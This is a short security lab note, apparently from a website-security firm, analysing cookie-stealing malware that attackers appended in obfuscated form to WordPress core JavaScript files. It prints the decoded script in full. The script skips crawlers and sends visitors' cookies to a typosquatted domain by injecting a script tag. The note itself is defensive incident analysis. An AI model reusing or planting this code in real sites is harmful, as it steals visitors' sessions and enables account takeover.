WordPrssAPI Steals Your Cookies

Labs Note

Cookies are an important part of a visiting session on a website. It is used not only to keep track of actions taken on a specific website by a particular user, but also its login sessions. Having those cookies stolen can easily lead to a compromise of any admin area you visit and allow the attacker to know what you did on that specific website.

These types of attack (Cookie Stealing and Session Hijacking) are not the most common ones due to the complexity involved in the process and because they are usually time sensitive (cookie expiration).

During an incident response investigation, we found a Cookie Stealing malware pretending to be working with one of WordPress’s core domains. Hackers injected an obfuscated (typical eval(function(p,a,c,k,e,d) obfuscation) JavaScript code at the bottom of legitimate .js files such as wp-includes/js/hoverIntent.min.js. Once decoded we see the following:

function adsadsgg() {  var gd = document.cookie.indexOf("_utmzz=");  if (gd == -1 && (/Applebot|baiduspider|Bingbot|Googlebot|ia_archiver|msnbot|Naverbot|seznambot|Slurp|teoma|Yandex|Yeti/i.test(navigator.userAgent) == false)) {     var rd = Math.floor(Math.random() * 2);     if (rd == 0) {          var sss = document.createElement('script');         sss.src = "hxxps://code.wordprssapi[.]com/ajax/json.aspx?c=" + escape(document.cookie);            document.body.appendChild(sss)      }       var dd = new Date();        dd.setTime(dd.getTime() + 86400000);        window.document.cookie = "_utmzz=ga; expires=" + dd.toGMTString() }}if (typeof(jQuery) != 'undefined') {  jQuery(function() {     adsadsgg()  })} else {  window.onload = function() {        adsadsgg()  }}

In the snippet above, we can see that the stolen cookie data is being sent to the fake domain code.wordprssapi[.]com (see the typo?) which is a way to trick people into thinking that it actually sends it an official WordPress domains, which it is not. And by the way code.wordprEssapi.com also has nothing to do with real WordPress. Actually, even if it was an official WordPress domain, sending your cookies to it would be a big red flag! It’s a private information that should not be shared with any third-parties. Like passwords.

The attackers also went the extra mile to ensure that they do not receive any cookie information from crawlers and bots such as Googlebot so that they only receive data that can be immediately used.

As the malicious code was injected into a WordPress core file, a quick integrity check would alert the user about the issue. For more detailed instructions on how to clean a hacked WordPress site check our step-by-step guide.

You May Also Like